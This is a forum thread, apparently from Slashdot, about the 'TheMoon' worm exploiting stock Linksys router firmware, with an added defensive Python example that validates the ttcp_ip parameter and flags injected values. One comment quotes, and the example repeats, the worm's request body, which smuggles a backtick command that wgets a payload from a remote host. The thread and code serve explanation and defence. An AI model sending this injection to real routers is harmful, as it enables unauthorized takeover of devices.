Linksys Routers Exploited By "TheMoon"
UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"
Slow your roll there, not all Linksys run Linux. Most run VxWorks RTOS. Only the Linksys routers flashed with DD-WRT firmware run Linux for sure.
Only affecting models not running Linux currently...
I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.
The worm infects a router with the following URL:
submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://source/ IP]:193/0Rx.mid;fi`&StartEPI=1
It appears that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears to be a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.
-=Lothsahn=-
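A defensive illustration of the point made in the comment above, added here and not taken from the thread or from any Linksys firmware: a form handler that passes ttcp_ip to a shell is exactly what lets a value like the one quoted run commands. The sketch below shows the hardened shape (accept only a literal IP address, build an argv list, never invoke a shell) together with a check that flags request bodies whose ttcp_ip is not an IP, which is useful when reviewing captured POST bodies. The function names, the ttcp argv layout and the two sample bodies are constructed assumptions; "[source IP]" stands in for the address the thread redacts.

```python
import ipaddress
import subprocess
from urllib.parse import parse_qs

# Constructed sample request bodies in the shape the thread quotes.
# "[source IP]" is a placeholder for the redacted address.
BENIGN_BODY = ("submit_button=&change_action=&submit_type=&action=&commit=0"
               "&ttcp_num=2&ttcp_size=2&ttcp_ip=192.0.2.5&StartEPI=1")
INJECTED_BODY = ("submit_button=&change_action=&submit_type=&action=&commit=0"
                 "&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];"
                 "then wget http://[source IP]:193/0Rx.mid;fi`&StartEPI=1")


def validate_ttcp_ip(value):
    """Return the value only if it parses as a bare IPv4/IPv6 address.

    ipaddress.ip_address() raises ValueError on anything else, so an option
    ("-h"), backticks, ';' and every other shell metacharacter are refused
    before the value can get anywhere near a command line.
    """
    return str(ipaddress.ip_address(value.strip()))


def build_ttcp_command(body):
    """Parse the form body and build an argv list for ttcp (hypothetical layout).

    No shell is involved: the vetted address is a single argv element and the
    counts are coerced to int, so neither can carry text into the command.
    """
    params = parse_qs(body, keep_blank_values=True)
    target = validate_ttcp_ip(params.get("ttcp_ip", [""])[0])
    num = int(params.get("ttcp_num", ["1"])[0])
    size = int(params.get("ttcp_size", ["1"])[0])
    return ["ttcp", "-t", "-n", str(num), "-l", str(size), target]


def run_ttcp(body):
    """Run the vetted command as an argv list, never as a shell string."""
    return subprocess.run(build_ttcp_command(body), capture_output=True, check=False)


def find_injected_ttcp_ip(bodies):
    """Return every ttcp_ip value in a batch of request bodies that is not a
    plain IP address; anything returned deserves a look."""
    suspicious = []
    for body in bodies:
        for value in parse_qs(body, keep_blank_values=True).get("ttcp_ip", []):
            try:
                ipaddress.ip_address(value.strip())
            except ValueError:
                suspicious.append(value)
    return suspicious


if __name__ == "__main__":
    print(build_ttcp_command(BENIGN_BODY))
    print(find_injected_ttcp_ip([BENIGN_BODY, INJECTED_BODY]))
```

The hardening does not try to strip "bad" characters from the parameter; it rejects anything that is not an address, which is the only thing a ttcp target field should ever hold, and the argv list means the value is never re-parsed by a shell even if validation were later loosened.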
Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.
and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.
no, it's just the default firmware.
"Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
from the comments on https://isc.sans.edu/forums/di...